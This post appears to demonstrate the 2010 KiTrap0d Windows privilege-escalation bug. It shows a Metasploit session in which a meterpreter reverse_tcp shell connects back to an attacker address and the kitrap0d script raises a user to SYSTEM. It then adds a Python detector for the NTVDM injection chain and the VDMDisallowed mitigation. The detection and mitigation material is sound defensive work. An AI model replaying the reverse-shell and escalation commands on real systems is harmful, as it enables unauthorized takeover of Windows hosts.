Original advisory:
http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack"
Now implemented in Metasploit:
msf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler on port 443
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.200:50777)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > sysinfo
Computer: WINXPSP3
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter > run ki
run killav run kitrap0d
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1128)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x29142 bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
[?] OpenProcess(1316) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7cc, INFINITE);
[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
**Nipple Rub...**
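For the blue team side of the session above: the transcript shows the exploit's host-visible footprint quite clearly. The unprivileged process (PID 1128) drops a DLL in the user's Temp directory, launches a 16-bit executable (`C:\WINDOWS\twunk_16.exe`, which Windows runs inside the NTVDM subsystem), opens that child, writes into its memory and injects a thread. The following is an added example, not code from the post or from Metasploit: a small Python detector that flags exactly that chain in process telemetry. The log format (`ProcessCreate` / `RemoteThread` lines with `actor`, `child`/`target` and `image` fields) is an assumption standing in for whatever your EDR or Sysmon export looks like, and the sample lines are constructed; the PIDs 1128 and 1316 echo the transcript. Microsoft's published workaround for this bug was to disable the 16-bit subsystem (the "Prevent access to 16-bit applications" Group Policy, `VDMDisallowed` under `HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat`), so any NTVDM start on a host where that policy is set is itself worth an alert.

```python
# Added example (not from the original post): flag the NTVDM abuse chain shown in the
# kitrap0d transcript -- a process launches a 16-bit image (run inside the NTVDM
# subsystem) and then creates a thread inside that child -- from process telemetry.
import re
from datetime import datetime, timedelta

# Constructed sample telemetry, not real logs. The log format is an assumption
# standing in for an EDR/Sysmon export; PIDs 1128/1316 echo the transcript.
SAMPLE_LOG = """\
2010-01-19T12:00:00 ProcessCreate actor=1128 child=1316 image=C:\\WINDOWS\\twunk_16.exe
2010-01-19T12:00:01 RemoteThread actor=1128 target=1316 image=C:\\WINDOWS\\twunk_16.exe
2010-01-19T12:05:00 ProcessCreate actor=1500 child=1600 image=C:\\WINDOWS\\notepad.exe
2010-01-19T12:05:02 RemoteThread actor=1700 target=1600 image=C:\\WINDOWS\\notepad.exe
2010-01-19T12:10:00 ProcessCreate actor=1800 child=1900 image=C:\\WINDOWS\\twunk_16.exe
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<kind>ProcessCreate|RemoteThread) actor=(?P<actor>\d+) "
    r"(?:child|target)=(?P<other>\d+) image=(?P<image>.+)$"
)

# Images that mean the 16-bit / NTVDM subsystem is involved.
NTVDM_IMAGES = {"twunk_16.exe", "ntvdm.exe"}


def parse_line(line):
    """Parse one telemetry line into a dict, or return None for unparseable input."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "kind": m["kind"],
        "actor": int(m["actor"]),
        "other": int(m["other"]),          # child pid or thread-target pid
        "image": m["image"].rsplit("\\", 1)[-1].lower(),
    }


def detect_ntvdm_injection(log_text, window=timedelta(seconds=60)):
    """Return (actor_pid, ntvdm_pid) pairs where one process both spawned an
    NTVDM-hosted image and then created a thread inside it within `window`.
    Lines are assumed to be in time order."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    spawned = {}   # child pid -> (creator pid, creation time) for NTVDM-hosted children
    hits = []
    for e in events:
        if e["kind"] == "ProcessCreate" and e["image"] in NTVDM_IMAGES:
            spawned[e["other"]] = (e["actor"], e["ts"])
        elif e["kind"] == "RemoteThread":
            creator = spawned.get(e["other"])
            # Only the spawning process injecting into its own fresh NTVDM child counts;
            # a debugger attaching to an unrelated process does not match.
            if creator and creator[0] == e["actor"] and e["ts"] - creator[1] <= window:
                hits.append((e["actor"], e["other"]))
    return hits


if __name__ == "__main__":
    for actor, target in detect_ntvdm_injection(SAMPLE_LOG):
        print(f"ALERT: pid {actor} spawned NTVDM process {target} and injected a thread into it")
```

On the constructed sample only the 1128 -> 1316 pair fires: the notepad case has a different actor injecting, and the second twunk_16.exe launch is never followed by a thread creation. Tune the window to your telemetry's clock resolution, and treat the NTVDM launch alone as a lower-severity signal on hosts where 16-bit applications have been disabled by policy.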